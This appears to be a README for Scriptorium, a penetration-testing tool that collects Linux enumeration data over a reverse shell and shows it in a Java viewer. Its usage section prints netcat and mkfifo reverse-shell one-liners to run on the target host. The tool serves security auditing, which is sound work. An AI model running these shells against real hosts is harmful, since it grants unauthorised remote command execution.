Scriptorium is a Linux machine state and network enumeration, data visualisation and analysis tool collection. It's aimed to help during penetration tests and security audits trying to simplify the machine and network enumeration required to detect configuration problems and possible privilege escalation vulnerabilities on hosts.
Data is collected using the "scriptenum.py" tool. The output is written in human readable text files (.txt) and more data files (.dat) that are read by IAE.
Scriptorium IAE can be used to visualise, search, analyse and annotate the enumeration output. It integrates also with the Exploit DB and allows to enumerate a network topology.
scriptenum.py is a python script that, in remote enumeration mode, waits for an incoming connection from a reverse bind shell, then executes more than 300 commands to assess the state of the target machine. Once this is done, it goes into an interactive shell whose output is logged as part of the data files as well. In case the connection is dropped during the enumeration, the tool waits for a reconnect and continues where it has been interrupted.
The manual shell sends a keep alive pulse to help prevent dropping by accident and internal command help can be invoked by typing '?' as command. The tool can also be started for local machine enumeration creating data files that also can be feed to IAE. Moreover, the script provides an interactive shell mode logged into the standard output data files.
Note: Before running against a host, perform a test run from another terminal windows on your local machine.
Usage: Remote Enumeration
The script should be started while being in the pen-test "project directory", empty or not. The tool creates all data files in the current directory. New runs do not overwrite the previous files and the new data files are added to the same project, as long as they are in the same project folder. The output files are .txt files, for humans still in love with nano or vi, and .dat files to be read by IAE. Both files types contain the same information.
Default listening port is 8189.
/projects/test123$ python /whatever/scriptorium.py -o enum /projects/test123$ python /whatever/scriptorium.py -o enum -p 8080 /projects/test123$ python /whatever/scriptorium.py -h
On the target host, all that is needed is a netcat started like this:
/home/bernd$ nc -v -e /bin/sh host port
Some netcat versions (like the OpenBSD one) do not have the 'execute' switch integrated (smart :). In this case, there are ways to handle that issue using a Linux FIFO object.
rm -f /tmp/scriptoriumpipe mkfifo /tmp/scriptoriumpipe cat /tmp/scriptoriumpipe | /bin/sh -i 2>&1 | nc ip port > /tmp/scriptoriumpipe rm -f /tmp/scriptoriumpipe
mkfifo scriptoriumpipe ; nc 2600 0<scriptoriumpipe | /bin/bash 1>scriptoriumpipe
Notes: Above shell code found on the Internet, HT to the authors. Change 'scriptoriumpipe' to something more neutral and short :)
Usage: Local Enumeration
To run the script on the local machine and just create the output files, without network operations, use the "-o local" flag.
Usage: Interactive Shell
Just start the tool and wait for an incoming connection as described section 'remote enumeration'.
/projects/test123$ python /whatever/scriptorium.py -o shell -p 8080 /projects/test123$ python /whatever/scriptorium.py -h
Scriptorium IAR takes the output files generated by the python tool and displays it in a hierarchical way, easy to browse. It’s searchable, commands are bookmarkable. The user can make annotations stored beside the ‘raw’ data files in order to keep them safe for later.
The application requires Java 8 (which includes JavaFX 8) to be installed. No other tool or dependency. No database. The tool can be started by executing the JAR file, as described below.
Build 'n Run
You can either using maven to build, or open the project in your favorite IDE and hit "RUN".
# Build: $> mvn package . # Run via maven $> mvn exec:java
# Run the JAR $> java -jar target/be.imifos.scriptorium-1.0.0-SNAPSHOT.jar*
Sometimes double-clicking the JAR just executes the above line.
Note: On Linux, you would need to install JavaFX when using the OpenJDK:
$> sudo apt-get install openjfx
I use a self-made mini framework to manage the JavaFX TreeView. That's why the code is a bit more complicated that it could be for this simple case (no backing database, just 3 node types). Moreover, I fully dive into object-oriented design by using Interfaces to drive behaviour and by taking the "Classes" (not only objects) as full citizens.
I'm sorry for requiring Java 8, but once you have tasted the amazing power of Lambda Expressions, you wonder how you were ever able to live without ;-)
A yes, in case you wondered... IAE stands for Integrated Analysis Environment. It's inspired by IDE and obviously the best name I ever came up with and the most professional thing in this project. ;-)
License (Short Version)
TLDR; It's free, but you use it at your own risk!
This tool may be used for legal purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If you do not accept these condition then you are prohibited from using this tool.
In all other respects the GPL version 2 applies:
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.